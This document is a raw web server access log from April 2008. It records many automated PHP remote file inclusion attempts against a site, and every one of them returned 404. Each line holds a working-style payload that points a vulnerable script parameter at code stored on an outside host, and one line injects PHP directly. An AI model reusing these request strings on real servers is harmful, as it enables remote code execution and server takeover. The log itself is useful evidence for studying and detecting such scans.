208.201.241.88 - - [01/Apr/2008:06:26:18 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
208.201.241.88 - - [01/Apr/2008:06:26:18 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
208.201.241.88 - - [01/Apr/2008:06:26:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:06:26:54 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:06:26:55 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:06:26:55 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:06:26:55 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:06:27:10 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:06:27:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:06:27:10 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:28:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:28:17 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:28:18 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:06:30:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:06:30:03 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:06:30:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:06:30:05 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:06:30:05 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:30:35 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:30:35 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:30:35 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:30:49 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:30:49 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:30:49 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:31:35 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:31:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:31:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:31:37 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:31:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:31:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
213.156.192.5 - - [01/Apr/2008:06:31:50 -0700] "GET /logs/access_080101.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.156.192.5 - - [01/Apr/2008:06:31:50 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.156.192.5 - - [01/Apr/2008:06:31:51 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:33:10 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:33:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
88.1.238.170 - - [01/Apr/2008:06:33:41 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.varliktanveriler.com/guestbook/tmp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:06:36:09 -0700] "GET /logs/access_071101.log/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:38:04 -0700] "GET /logs/access.log//atom.php5?page=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:38:05 -0700] "GET //atom.php5?page=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:38:05 -0700] "GET /logs//atom.php5?page=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:06:38:36 -0700] "GET /logs/access.log/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:06:38:41 -0700] "GET /index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:06:38:43 -0700] "GET /logs/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:06:38:54 -0700] "GET /logs/access.log/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:40:11 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:42:12 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
222.236.47.176 - - [01/Apr/2008:06:42:15 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.236.47.176 - - [01/Apr/2008:06:42:16 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.236.47.176 - - [01/Apr/2008:06:42:17 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:43:15 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:43:16 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:44:11 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:44:11 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:46:45 -0700] "GET //ashnews.php?pathtoashnews=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:46:45 -0700] "GET /logs//ashnews.php?pathtoashnews=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:06:47:34 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:47:42 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:47:43 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:47:43 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:49:38 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:49:38 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:50:20 -0700] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:50:20 -0700] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:06:51:54 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:06:51:54 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:06:51:54 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:53:13 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:53:49 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:53:49 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:53:51 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:53:52 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:53:53 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:53:53 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.24.154 - - [01/Apr/2008:06:54:01 -0700] "GET /logs/access.log//atom.php5?page=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.24.154 - - [01/Apr/2008:06:54:01 -0700] "GET //atom.php5?page=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.24.154 - - [01/Apr/2008:06:54:02 -0700] "GET /logs//atom.php5?page=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:06:54:46 -0700] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:06:54:46 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:54:53 -0700] "GET /logs/access_080101.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:06:54:59 -0700] "GET /logs/access_080101.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:55:08 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:06:55:08 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:55:21 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:55:22 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:56:12 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:56:31 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:56:31 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:56:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:56:58 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:56:58 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:56:58 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:05 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:10 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:20 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:21 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:29 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:29 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:06:57:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
74.6.22.121 - - [01/Apr/2008:07:00:13 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.22.121 - - [01/Apr/2008:07:00:13 -0700] "GET /logs/access.log HTTP/1.0" 200 396769 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
89.108.64.152 - - [01/Apr/2008:07:00:18 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.64.152 - - [01/Apr/2008:07:00:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:07:00:46 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:07:00:46 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:07:04:06 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:07:04:06 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:07:04:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:07:05:05 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:07:05:05 -0700] "GET //config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
